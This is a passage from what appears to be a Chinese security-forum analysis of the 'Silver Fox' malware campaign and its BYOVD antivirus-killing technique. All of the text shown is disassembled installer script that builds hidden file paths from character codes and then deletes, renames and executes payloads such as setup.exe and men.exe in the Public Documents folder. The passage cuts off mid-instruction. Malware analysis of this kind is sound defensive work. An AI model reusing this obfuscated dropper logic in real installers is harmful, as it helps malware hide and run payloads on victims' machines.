主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
z3960发表于 2026-02-21 07:49
; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_1d46pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var4pushvar Var8 ; StackCount = 10call DELETEFILEpop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7loc_1d46:pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var4pushtype UnicodeString_2 ; StackCount = 10assign Var10, Var3pushvar Var8 ; StackCount = 11call RENAMEFILEpop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7loc_1d7a:pushtype WideString ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(26)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(67)assign Var11[1], S32(58)assign Var11[2], S32(92)assign Var11[3], S32(85)assign Var11[4], S32(115)assign Var11[5], S32(101)assign Var11[6], S32(114)assign Var11[7], S32(115)assign Var11[8], S32(92)assign Var11[9], S32(80)assign Var11[10], S32(117)assign Var11[11], S32(98)assign Var11[12], S32(108)assign Var11[13], S32(105)assign Var11[14], S32(99)assign Var11[15], S32(92)assign Var11[16], S32(68)assign Var11[17], S32(111)assign Var11[18], S32(99)assign Var11[19], S32(117)assign Var11[20], S32(109)assign Var11[21], S32(101)assign Var11[22], S32(110)assign Var11[23], S32(116)assign Var11[24], S32(115)assign Var11[25], S32(92)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(9)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(115)assign Var11[1], S32(101)assign Var11[2], S32(116)assign Var11[3], S32(117)assign Var11[4], S32(112)assign Var11[5], S32(46)assign Var11[6], S32(101)assign Var11[7], S32(120)assign Var11[8], S32(101)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8assign Var6, Var8pop ; StackCount = 7pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var6pushvar Var8 ; StackCount = 10call FILEEXISTSpop ; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_21edpushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(0)pushtype S32 ; StackCount = 11assign Var11, S32(5)pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype S32 ; StackCount = 15assign Var15, S32(0)pushvar Var14 ; StackCount = 16call SETARRAYLENGTHpop ; StackCount = 15pop ; StackCount = 14assign Var13, Var14pop ; StackCount = 13pushvar Var12 ; StackCount = 14call STRFROMCODEpop ; StackCount = 13pop ; StackCount = 12pushtype UnicodeString_2 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(0)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14pushvar Var13 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype UnicodeString_2 ; StackCount = 14assign Var14, Var6pushvar Var8 ; StackCount = 15call EXECpop ; StackCount = 14pop ; StackCount = 13pop ; StackCount = 12pop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7loc_21ed:pushtype WideString ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(25)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(67)assign Var11[1], S32(58)assign Var11[2], S32(92)assign Var11[3], S32(85)assign Var11[4], S32(115)assign Var11[5], S32(101)assign Var11[6], S32(114)assign Var11[7], S32(115)assign Var11[8], S32(92)assign Var11[9], S32(80)assign Var11[10], S32(117)assign Var11[11], S32(98)assign Var11[12], S32(108)assign Var11[13], S32(105)assign Var11[14], S32(99)assign Var11[15], S32(92)assign Var11[16], S32(68)assign Var11[17], S32(111)assign Var11[18], S32(99)assign Var11[19], S32(117)assign Var11[20], S32(109)assign Var11[21], S32(101)assign Var11[22], S32(110)assign Var11[23], S32(116)assign Var11[24], S32(115)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(8)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11assign Var11[0], S32(92)assign Var11[1], S32(109)assign Var11[2], S32(101)assign Var11[3], S32(110)assign Var11[4], S32(46)assign Var11[5], S32(101)assign Var11[6], S32(120)assign Var11[7], S32(101)assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8assign Var5, Var8pop ; StackCount = 7pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var5pushvar Var8 ; StackCount = 10call FILEEXISTSpop ; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_263apushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(0)pushtype S32 ; StackCount = 11assign Var11, S32(0)pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount
回帖(7):